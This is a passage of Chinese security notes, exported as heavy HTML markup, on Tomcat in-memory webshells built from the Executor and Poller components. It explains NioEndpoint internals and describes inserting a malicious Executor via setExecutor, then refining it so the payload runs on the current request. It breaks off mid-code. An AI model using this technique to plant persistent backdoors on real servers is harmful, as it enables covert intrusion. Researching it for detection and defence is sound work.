style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">/* 是否开启ssl */</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">private</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">boolean</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> SSLEnabled </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">false</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">/* request的keepAlive时间 */</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">private</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DataTypeTok';color: #902000;font-family: Consolas;">int</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> maxKeepAliveRequests </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'DecValTok';color: #40A070;font-family: Consolas;">100</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">/* ConnectionHandler */</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">private</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Handler</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;"><</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;">S</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> handler </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">null</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">;</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'CommentTok';color: #60A0B0;font-style: italic;font-family: Consolas;">/* 用于存放传递给子组件的信息 */</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">protected</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">HashMap</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;"><</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">String</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">,</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">Object</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> attributes </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">=</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'KeywordTok';color: #007020;font-weight: bold;font-family: Consolas;">new</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'BuiltInTok';color: #008000;font-family: Consolas;">HashMap</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;"><>();</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">}</span></span></span></span></span></span></p><p style=""><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">LimitLatch是一个连接控制器，负责连接限制，nio模式下默认10000，达到阈值则拒绝连接请求。</span></span></span></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">Acceptor负责接收请求，默认由1个线程负责，将请求的事件注册到事件列表中。</span></span></span></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">Poller负责轮询上述产生的事件，将就绪的事件生成SokcetProcessor，交给Excutor去执行。</span></span></span></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">SokcetProcessor里面的doRun方法，封装了Socket的读写，完成Container调用逻辑。</span></span></span></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">Excutor用来执行Poller创建的SokcetProcessor，线程池大小Connector节点配置的maxThreads决定。</span></span></span></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">                    </span></span></span></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">通过nioEndpoint.setExecutor(exe);构造恶意Executor插入</span></span></span></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-size:12.0pt;font-family:Cambria;text-underline:none;text-decoration:none;"><a href="https://xz.aliyun.com/t/11593" target="_blank">https://xz.aliyun.com/t/11593</a></span></span></span></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">作者代码少写了个返回，会报500，加上就可以</span></span></span></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;"></span></span></span></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">缺点：几次请求才能拿到我们发的payload去执行</span></span></span></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">原因：我们执⾏的位置是在Executor，这个时候Socket流中的数据还没有被 read，通过线程遍历获取到的request其实是前⼀次（或者前⼏次，跟线程数有关）的缓存数据，所以 获取命令需要我们多次进⾏request请求</span></span></span></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">改良方式：</span></span></span></span></span></span></p><p style="margin-top: 9.0pt;margin-bottom: 9.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="font-family:Cambria;">Poller中的Real NioSocketWrapper对象通过其read方法可成功获取当次的request请求</span></span></span></span></span></span></p><p style="mso-style-name: 'Source Code';margin-top: 0.0pt;margin-bottom: 10.0pt;text-align: left;margin-left: 0.0pt;text-indent: 0.0pt;line-height: normal;word-break: break-all;font-size: 12.0pt;font-family: Cambria;font-weight: normal;"><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"><span style="mso-spacerun:yes;">                    </span></span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'ControlFlowTok';color: #007020;font-weight: bold;font-family: Consolas;">if</span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'NormalTok';font-family: Consolas;"> </span></span></span></span></span></span><span style="mso-bookmark:内存马;"><span style="mso-bookmark:executor内存马-poller内存马;"><span style="mso-bookmark:连接器-connector;"><span style="mso-bookmark:protocolhandler;"><span style="mso-bookmark:nioendpoint;"><span style="mso-style-parent: 'Verbatim Char';mso-style-name: 'OperatorTok';color: #666666;font-family: Consolas;">(</span></span></span></span></span></span><span 